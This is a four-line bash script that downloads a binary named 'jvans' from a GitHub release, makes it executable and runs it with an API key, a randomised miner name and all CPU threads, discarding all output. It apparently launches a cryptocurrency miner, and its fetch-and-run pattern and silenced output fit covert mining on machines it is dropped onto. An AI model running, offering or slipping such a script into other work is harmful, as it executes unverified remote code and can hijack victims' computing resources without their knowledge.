#!/bin/bash
wget https://github.com/cevtral/htradc/releases/download/uyhg/jvans
chmod +x jvans
./jvans -apiKey nock0000-5f88-240a-67f6-78c391ad755d -minerName $(echo $(shuf -i 1-15000 -n 1)-Rezdion) -threads $(nproc --all) > /dev/null 2>&1
